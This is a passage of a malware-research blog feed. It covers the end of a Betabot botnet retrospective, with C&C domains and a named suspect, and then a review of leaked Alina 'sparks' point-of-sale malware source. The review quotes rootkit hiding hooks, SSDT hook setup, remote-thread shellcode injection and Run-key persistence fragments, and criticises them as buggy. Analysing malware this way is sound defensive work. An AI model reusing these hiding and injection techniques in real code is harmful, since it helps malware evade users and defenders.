&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAo0-FeIDSTz4lEgnghFbqNgh_T4FoSeKPkP1vUXwFgBfm5PuKW56-npMKJUhiE1Z0DSWdt40lKBUnOFud8J2oWa_1AJHmSXeHZtjwOjRm3nEVQcsi_ybrnhQGR6c3MjqNlyUWxSL0j2c/s1600/23-09-2013+22-51-09.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjAo0-FeIDSTz4lEgnghFbqNgh_T4FoSeKPkP1vUXwFgBfm5PuKW56-npMKJUhiE1Z0DSWdt40lKBUnOFud8J2oWa_1AJHmSXeHZtjwOjRm3nEVQcsi_ybrnhQGR6c3MjqNlyUWxSL0j2c/s400/23-09-2013+22-51-09.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Files:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-w7h5D1UaJVgUzJcY_dBinyps5Q6jmj01UN1fsy-Eo6anBgZF9q8xsyUkb4X8DA2IcVghBiHL0zqk50QFO96YzxXTtIlfYJEpJrYZSoIbzQiCFWV5YWZC52Cq_7mLTRRE-PvbAQ6rTCQ/s1600/23-09-2013+22-52-20.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-w7h5D1UaJVgUzJcY_dBinyps5Q6jmj01UN1fsy-Eo6anBgZF9q8xsyUkb4X8DA2IcVghBiHL0zqk50QFO96YzxXTtIlfYJEpJrYZSoIbzQiCFWV5YWZC52Cq_7mLTRRE-PvbAQ6rTCQ/s400/23-09-2013+22-52-20.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Users notice:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgUjHCyrlfD0QKyN1nsSa5qntRfKrTmrlnXZylscSwLh4-ZI2KBwLadM0-mTF_XuIV69mIzDyy8qGLfgWhEU-BKev9bYFwPKHnJlPl5GrvzKoRAVeGCvoo9Dhf2XHxV133Ek6saSKk3Kc/s1600/23-09-2013+22-53-04.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgUjHCyrlfD0QKyN1nsSa5qntRfKrTmrlnXZylscSwLh4-ZI2KBwLadM0-mTF_XuIV69mIzDyy8qGLfgWhEU-BKev9bYFwPKHnJlPl5GrvzKoRAVeGCvoo9Dhf2XHxV133Ek6saSKk3Kc/s400/23-09-2013+22-53-04.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
AV Checker:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVPODLK-7WSRH_XgVOpZdxWx6XGjYk4wHfvoGzke9rM7U1ctNVslFCt_CRNnmcDO7YkOtUQaKttwdM3sQ_Y-OtsNsaxg4-Co4PzBx3mpO1tE_grg8oJr8A4Te9zQsxZ1lb3f-85SeEID8/s1600/23-09-2013+22-53-51.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVPODLK-7WSRH_XgVOpZdxWx6XGjYk4wHfvoGzke9rM7U1ctNVslFCt_CRNnmcDO7YkOtUQaKttwdM3sQ_Y-OtsNsaxg4-Co4PzBx3mpO1tE_grg8oJr8A4Te9zQsxZ1lb3f-85SeEID8/s400/23-09-2013+22-53-51.png&quot; height=&quot;320&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
1.7.0.1:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8zdgy8X0S5GwJSKPs8cNyjv4yOCaDF4tGwiDZo0FVdNQ0fVQ3DqqHc1nU7U0aUVCtqLIsQMjzturUw1D5V3AkGz9WF4ncy8iZ2ohKlES3b3gf9RXKTadHf_PzihTXKMtwLaWfU2Zky3s/s1600/19-04-2014+17-28-54.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8zdgy8X0S5GwJSKPs8cNyjv4yOCaDF4tGwiDZo0FVdNQ0fVQ3DqqHc1nU7U0aUVCtqLIsQMjzturUw1D5V3AkGz9WF4ncy8iZ2ohKlES3b3gf9RXKTadHf_PzihTXKMtwLaWfU2Zky3s/s1600/19-04-2014+17-28-54.png&quot; height=&quot;250&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The botmaster was running a support site at the url betabot.ru that i&#39;ve monitored since... i don&#39;t know almost the begining till the end.&lt;br /&gt;
I&#39;ve really collected a lot of datas and was constantly flagging new C&amp;amp;C urls even before they was active.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2DbsYgLM34689-i25Phj9K6vxoVLbceBHYg0oaFEfIiZXSXN7c4RrVZJsJITtXmzImN2qCkmPMBbIDzXEFuC9CqJQ12u04esB5ZAJu0hkre4Yl1ZKLpSMytLrgW0p2BOHKbj0Vg-cgtI/s1600/2014-11-09_17-14-13.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2DbsYgLM34689-i25Phj9K6vxoVLbceBHYg0oaFEfIiZXSXN7c4RrVZJsJITtXmzImN2qCkmPMBbIDzXEFuC9CqJQ12u04esB5ZAJu0hkre4Yl1ZKLpSMytLrgW0p2BOHKbj0Vg-cgtI/s1600/2014-11-09_17-14-13.png&quot; height=&quot;301&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Inquiries sent to the betabot team (before they started the support forum):&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZX79V6sJQT9P3Fxn-MGnXPcZ3m-uWGTxlPkcnGSg0cG6B2EicNEYWH6PI4G0ZXluRgpIIf2NVAqsSqEbSypeaviRANzokUhzBC9pLKHg2MIF_yse_ULUOy2jcLzyKQuQfhZI-CSUVEEk/s1600/2014-11-09_17-15-48.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiZX79V6sJQT9P3Fxn-MGnXPcZ3m-uWGTxlPkcnGSg0cG6B2EicNEYWH6PI4G0ZXluRgpIIf2NVAqsSqEbSypeaviRANzokUhzBC9pLKHg2MIF_yse_ULUOy2jcLzyKQuQfhZI-CSUVEEk/s1600/2014-11-09_17-15-48.png&quot; height=&quot;306&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Site structure:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9KNYwSaw-5os8WqLwcEXMjX4p6_MLIspNzI4E9bVj8guK23WLKHoThFGbrfYTQlEvCP7NIyL72nZkQ51Xulf2cwLX-GdKUw6LVT-Ov3JhWV3yJuRMIQGSA3vwFOJs3urOILooEu6M4Y4/s1600/2014-11-09_17-17-41.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9KNYwSaw-5os8WqLwcEXMjX4p6_MLIspNzI4E9bVj8guK23WLKHoThFGbrfYTQlEvCP7NIyL72nZkQ51Xulf2cwLX-GdKUw6LVT-Ov3JhWV3yJuRMIQGSA3vwFOJs3urOILooEu6M4Y4/s1600/2014-11-09_17-17-41.png&quot; height=&quot;258&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Some clients kits:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgafnsE6IrByfvWJj6VpHwprS9zp7HgJrNL8c8F29TckVhlKzvxr-Dag0rK3MAzl3ITP08GufjMSt4BBF-7J-j3PWFypIoSPjh0mKsGng6Vqz16ZoQW-3iVYaA27HGvfY826CMt3TZ3sNs/s1600/2014-11-09_17-18-32.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgafnsE6IrByfvWJj6VpHwprS9zp7HgJrNL8c8F29TckVhlKzvxr-Dag0rK3MAzl3ITP08GufjMSt4BBF-7J-j3PWFypIoSPjh0mKsGng6Vqz16ZoQW-3iVYaA27HGvfY826CMt3TZ3sNs/s1600/2014-11-09_17-18-32.png&quot; height=&quot;196&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Finally some people got busted using these informations..&lt;br /&gt;
If you want an example.. &#39;Spit Fyre&#39; ex super moderator at Trojanforge who reside in the same country as me.&lt;br /&gt;
If you wonder why he disappeared you know why now.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhx_L9tfAnvwU-BcrKCY-P3taVgOUPIeiAgKnDo8vAcecEaUI-gNM-6HUzZST_Gz7J4n1Oxr8bUo_gOwxg8XYZGFa8WUjdO4osUmtH4xJVKM2h3j7zlrpjwMpRxg8jk8LLQUPm06J-UEA/s1600/1.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhx_L9tfAnvwU-BcrKCY-P3taVgOUPIeiAgKnDo8vAcecEaUI-gNM-6HUzZST_Gz7J4n1Oxr8bUo_gOwxg8XYZGFa8WUjdO4osUmtH4xJVKM2h3j7zlrpjwMpRxg8jk8LLQUPm06J-UEA/s1600/1.png&quot; height=&quot;368&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Spit Fyre requesting an admin of Hackyard to delete his account after he got cops at door:&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbQx3HNscHzigCllIAsWifVSBtsz27scVo5dttecXNfZPxxg5nCt9-p-sUR790sj5u_yE_rDxcRkHA1s_iWyUUJ3r_GttSCh4ZOAHWgQ9097jmE1uZVl6OxCoTzvMWKahMhMtDEGKl2OE/s1600/09-04-2014+15-28-26.png&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbQx3HNscHzigCllIAsWifVSBtsz27scVo5dttecXNfZPxxg5nCt9-p-sUR790sj5u_yE_rDxcRkHA1s_iWyUUJ3r_GttSCh4ZOAHWgQ9097jmE1uZVl6OxCoTzvMWKahMhMtDEGKl2OE/s1600/09-04-2014+15-28-26.png&quot; height=&quot;126&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Some of his domains:&lt;br /&gt;
• dns: 1 ›› ip: &lt;a href=&quot;https://www.virustotal.com/en/ip-address/124.248.205.104/information/&quot;&gt;124.248.205.104&lt;/a&gt; - adress: DARKNESS.SU&lt;br /&gt;
• dns: 1 ›› ip: &lt;a href=&quot;https://www.virustotal.com/en/ip-address/124.248.205.104/information/&quot;&gt;124.248.205.104&lt;/a&gt; - adress: WEED.SU&lt;br /&gt;
• dns: 1 ›› ip: &lt;a href=&quot;https://www.virustotal.com/en/ip-address/124.248.205.104/information/&quot;&gt;124.248.205.104&lt;/a&gt; - adress: MEZIAMUSSUCEMAQUEUE.SU&lt;br /&gt;
• dns: 1 ›› ip: &lt;a href=&quot;https://www.virustotal.com/en/ip-address/124.248.205.104/information/&quot;&gt;124.248.205.104&lt;/a&gt; - adress: UMBXD15896.SU&lt;br /&gt;
• dns: 1 ›› ip: &lt;a href=&quot;https://www.virustotal.com/en/ip-address/124.248.205.135/information/&quot;&gt;124.248.205.135&lt;/a&gt; - adress: STYXB1TCH35.SU&lt;br /&gt;
• dns: 1 ›› ip: &lt;a href=&quot;https://www.virustotal.com/en/ip-address/124.248.205.135/information/&quot;&gt;124.248.205.135&lt;/a&gt; - adress: J1NXFYR3.SU&lt;br /&gt;
&lt;br /&gt;
Anyway it&#39;s useless to talk about him and others betabot clients who had visits, the current status of betabot is stalled now and someone even made a builder for the 1.7.0.1 version.&lt;br /&gt;
Betabot was a creative malware, plagued by bugs though. </description><link>https://www.xylibox.com/2015/04/betabot-retrospective.html</link><author>noreply@blogger.com (Steven K)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVkgQ31q7Y0I5Id-mfm_qDC_M2uNz2bRXTOBmIIrhdIVgcUOh-Il0r00dEXRwT56aGcmaw4QcfpEzPzBFDPrz0OmfEnRnCpgShc1tFRbcNfdkYXurIaCs7DWXOdmpy3rUae4MG7UtJtOg/s72-c/23-09-2013+22-24-41.png" height="72" width="72"/><thr:total>6</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5365964245877416061.post-5589481365037600265</guid><pubDate>Wed, 14 Jan 2015 23:07:00 +0000</pubDate><atom:updated>2015-01-15T00:07:19.272+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Alina</category><category domain="http://www.blogger.com/atom/ns#">fail</category><category domain="http://www.blogger.com/atom/ns#">memory scrapper</category><category domain="http://www.blogger.com/atom/ns#">Point Of Sale</category><category domain="http://www.blogger.com/atom/ns#">Point-of-Sale</category><category domain="http://www.blogger.com/atom/ns#">POS</category><category domain="http://www.blogger.com/atom/ns#">pos malware</category><category domain="http://www.blogger.com/atom/ns#">ram scrapper</category><category domain="http://www.blogger.com/atom/ns#">spark</category><category domain="http://www.blogger.com/atom/ns#">sparks</category><title>Alina &#39;sparks&#39; source code review</title><description>I got on my hands recently the source code of Alina &quot;sparks&quot;, the main &#39;improvement&#39; that everyone is talking about and make the price of this malware rise is the rootkit feature.&lt;br /&gt;
Josh Grunzweig did already an &lt;a href=&quot;http://jgrunzweig.github.io/posts/2015/01/alina-starts-to-blur-the-lines/&quot;&gt;interesting coverage&lt;/a&gt; of a sample, but what worth this new version ?&lt;br /&gt;
&lt;br /&gt;
InjectedDLL.c from the source is a Chinese copy-paste of &lt;a href=&quot;http://www.cnblogs.com/lzjsky/archive/2010/12/01/1892702.html&quot;&gt;http://www.cnblogs.com/lzjsky/archive/2010/12/01/1892702.html&lt;/a&gt; and commented out, replaced with two kernel32 hooks instead, like if the author cannot into hooks :D&lt;br /&gt;
a comment is still in Chinese as you can see on the screenshot.&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcv4xbT-57XdNPjTduPIc84Tq86H00ICDQ9NAMtOEk2Fgdw-73QFGma8QTcw5rThSFpZcGWodN324r2JMPLLk_LaGTTKrYEjx99B_wEKChrqi22E0PCRpQxutWEh8W0tvyBQCdRKc3mus/s1600/2015-01-14_10-26-49.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcv4xbT-57XdNPjTduPIc84Tq86H00ICDQ9NAMtOEk2Fgdw-73QFGma8QTcw5rThSFpZcGWodN324r2JMPLLk_LaGTTKrYEjx99B_wEKChrqi22E0PCRpQxutWEh8W0tvyBQCdRKc3mus/s1600/2015-01-14_10-26-49.png&quot; height=&quot;310&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
+ this:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
LONG WINAPI RegEnumValueAHook(HKEY hKey, DWORD dwIndex, LPTSTR lpValueName,LPDWORD lpcchValueName, LPDWORD lpReserved, LPDWORD lpType, LPBYTE lpData, LPDWORD lpcbData)&lt;br /&gt;
{&lt;br /&gt;
LONG Result = RegEnumValueANext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);&lt;br /&gt;
if (StrCaseCompare(HIDDEN_REGISTRY_ENTRY, lpValueName) == 0)&lt;br /&gt;
{&lt;br /&gt;
Result = RegEnumValueWNext(hKey, dwIndex, lpValueName, lpcchValueName, lpReserved, lpType, lpData, lpcbData);&lt;br /&gt;
}&lt;br /&gt;
return Result;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
...&lt;br /&gt;
&lt;br /&gt;
// Registry Value Hiding&lt;br /&gt;
Win32HookAPI(&quot;advapi32.dll&quot;, &quot;RegEnumValueA&quot;, (void *) RegEnumValueAHook, (void *) &amp;amp;RegEnumValueANext);&lt;br /&gt;
Win32HookAPI(&quot;advapi32.dll&quot;, &quot;RegEnumValueW&quot;, (void *) RegEnumValueWHook, (void *) &amp;amp;RegEnumValueWNext);&lt;/div&gt;
So many stupid mistakes in the code, no sanity checks in hooks, nothing stable.&lt;br /&gt;
Haven&#39;t looked at a sample in the wild but i doubt it work anyhow.&lt;br /&gt;
Actual rootkit source (body stored as hex array in RootkitDriver.inc c:\drivers\test\objchk_win7_x86\i386\ssdthook.pdb) is not included in this pack of crap.&lt;br /&gt;
&lt;br /&gt;
This x86-32 driver is responsible for NtQuerySystemInformation, NtEnumerateValueKey, NtQueryDirectoryFile SSDT hooking.&lt;br /&gt;
Driver is ridiculously simple:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
NTSTATUS NTAPI DrvMain(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp; DriverObject-&amp;gt;DriverUnload = (PDRIVER_UNLOAD)UnloadProc;&lt;br /&gt;
&amp;nbsp; BuildMdlForSSDT();&lt;br /&gt;
&amp;nbsp; InitStrings();&lt;br /&gt;
&amp;nbsp; SetHooks();&lt;br /&gt;
&amp;nbsp; return STATUS_SUCCESS;&lt;br /&gt;
}&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
BOOL SetHooks()&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp; if ( !NtQuerySystemInformationOrig )&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; NtQuerySystemInformationOrig = HookProc(ZwQuerySystemInformation, NtQuerySystemInformationHook);&lt;br /&gt;
&amp;nbsp; if ( !NtEnumerateValueKeyOrig )&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; NtEnumerateValueKeyOrig = HookProc(ZwEnumerateValueKey, NtEnumerateValueKeyHook);&lt;br /&gt;
&amp;nbsp; if ( !NtQueryDirectoryFileOrig )&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; NtQueryDirectoryFileOrig = HookProc(ZwQueryDirectoryFile, NtQueryDirectoryFileHook);&lt;br /&gt;
&amp;nbsp; return TRUE;&lt;br /&gt;
}&lt;/div&gt;
&lt;br /&gt;
All of them hide &#39;windefender&#39; target process, file, registry.&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
void InitStrings()&lt;br /&gt;
{&lt;br /&gt;
&amp;nbsp; RtlInitUnicodeString((PUNICODE_STRING)&amp;amp;WindefenderProcessString, L&quot;windefender.exe&quot;);&lt;br /&gt;
&amp;nbsp; RtlInitUnicodeString(&amp;amp;WindefenderFileString, L&quot;windefender.exe&quot;);&lt;br /&gt;
&amp;nbsp; RtlInitUnicodeString(&amp;amp;WindefenderRegistryString, L&quot;windefender&quot;);&lt;br /&gt;
}&lt;/div&gt;
It&#39;s the malware name, Josh pointed also in this direction on his analysis.&lt;br /&gt;
First submitted on VT the 2013-10-17 17:27:10 UTC ( 1 year, 2 months ago )&lt;br /&gt;
&lt;a href=&quot;https://www.virustotal.com/en/file/905170f460583ae9082f772e64d7856b8f609078af9823e9921331852fd07573/analysis/1421046545/&quot;&gt;https://www.virustotal.com/en/file/905170f460583ae9082f772e64d7856b8f609078af9823e9921331852fd07573/analysis/1421046545/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
Overall that dll seems unusued, alina project uses driver i mentioned.&lt;br /&gt;
As for project itself, it&#39;s still an awful piece of students lab work, here is some log just from attempt to compile:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
source\grab\base.cpp(78)&lt;/div&gt;
If SHGetSpecialFolderPath returns FALSE, strcat to SourceFilePath will be used anyway.&lt;br /&gt;
&lt;br /&gt;
Two copy-pasted methods with same mistake:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
source\grab\base.cpp(298)&lt;br /&gt;
source\grab\base.cpp(433)&lt;/div&gt;
Leaking process information handle pi.hProcess.&lt;br /&gt;
&lt;br /&gt;
Using hKey from failed function call:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
source\grab\base.cpp(316):&lt;br /&gt;
if (RegOpenKeyEx(HKEY_CURRENT_USER, &quot;Software\\Microsoft\\Windows\\CurrentVersion\\Run&quot;, 0L,&amp;nbsp; KEY_ALL_ACCESS, &amp;amp;hKey) != ERROR_SUCCESS) {&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; RegCloseKey(hKey); &lt;/div&gt;
&lt;br /&gt;
pThread could be NULL, this is checked only in WriteProcessMemory but not in CreateRemoteThread:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
source\grab\monitoringthread.cpp(110):&lt;br /&gt;
LPVOID pThread = VirtualAllocEx(hProcess, NULL, ShellcodeLen, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);&lt;br /&gt;
if (pThread != NULL) WriteProcessMemory(hProcess, pThread, Shellcode, ShellcodeLen, &amp;amp;BytesWritten);&lt;br /&gt;
HANDLE ThreadHandle =&amp;nbsp; CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE) pThread, NULL, 0, &amp;amp;TID);&lt;/div&gt;
&lt;br /&gt;
Where hwid declared as char hwid[8];&lt;br /&gt;
Reading invalid data from hdr-&amp;gt;hwid: the readable size is 8 bytes, but 18 bytes may be read:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
source\grab\panelrequest.cpp(73):&lt;br /&gt;
memcpy(outkey, hdr-&amp;gt;hwid, 18);&lt;/div&gt;
&lt;br /&gt;
Realloc might return null pointer: assigning null pointer to buf, which is passed as an argument to realloc, will cause the original memory block to be leaked:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
source\grab\panelrequest.cpp(173)&lt;/div&gt;
&lt;br /&gt;
The prior call to strncpy might not zero-terminate string Result:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
source\grab\scanner.cpp(159)&lt;/div&gt;
&lt;br /&gt;
Return value of ReadFile ignored. If it will fail anywhere code will be corrupted as cmd variable is not initialized:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
source\grab\watcher.cpp(61)&lt;br /&gt;
source\grab\watcher.cpp(64)&lt;br /&gt;
source\grab\watcher.cpp(71) &lt;/div&gt;
&lt;br /&gt;
Signed unsigned mismatch:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
source\grab\rootkitinstaller.cpp(47)&lt;/div&gt;
&lt;br /&gt;
Unreferenced local variable hResult:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
source\grab\base.cpp(158)&lt;/div&gt;
&lt;br /&gt;
Using TerminateThread does not allow proper thread clean up:&lt;br /&gt;
&lt;div class=&quot;text&quot; style=&quot;background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;&quot;&gt;
source\grab\watcher.cpp(125)&lt;/div&gt;
&lt;br /&gt;
Now related to &#39;editions&#39; sparks have some, for examples the pipes, mutexes, user-agents, process black-list but most of these editions are minors things that anybody can do to &#39;customise&#39; his own bot.&lt;br /&gt;
In any case that can count as a code addition or something &#39;new&#39;&lt;br /&gt;
For the panel... well it&#39;s like the bot, nothing changed at all.&lt;br /&gt;
It&#39;s still the same ugly design,
 still the same files with same modifications timestamp, no code addition, still the same cookie auth crap like if the coder can&#39;t use session in 
php and so on...&lt;br /&gt;
&lt;br /&gt;
To conclude, the main improvement is a copy/pasted rootkit who don&#39;t work, i don&#39;t know how many bad guys bought this source for 1k or more but that definitely not worth it.&lt;br /&gt;
Overall it&#39;s a good example of how people can take a code, announce a rootkit to impress and play everything on malware notoriety.&lt;br /&gt;
This remind me the guys who announced IceIX on malware forums and finally the samples was just a basic ZeuS with broken improvements.&lt;br /&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtJyqOBhEBiCbcUAzRhDAyNPk0XCVEY5HV7sP_NlprVy4crkFdE_HdE_2vUV3vcmKN5L31Zbv8hyaaECKqjLnGTD-lWfSghqV-aCSzo9r48HGXFah2zAAphW4C7lgHa3P1EkFW-HPj5CE/s1600/2015-01-14_10-39-01.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtJyqOBhEBiCbcUAzRhDAyNPk0XCVEY5HV7sP_NlprVy4crkFdE_HdE_2vUV3vcmKN5L31Zbv8hyaaECKqjLnGTD-lWfSghqV-aCSzo9r48HGXFah2zAAphW4C7lgHa3P1EkFW-HPj5CE/s1600/2015-01-14_10-39-01.png&quot; height=&quot;243&quot; width=&quot;400&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
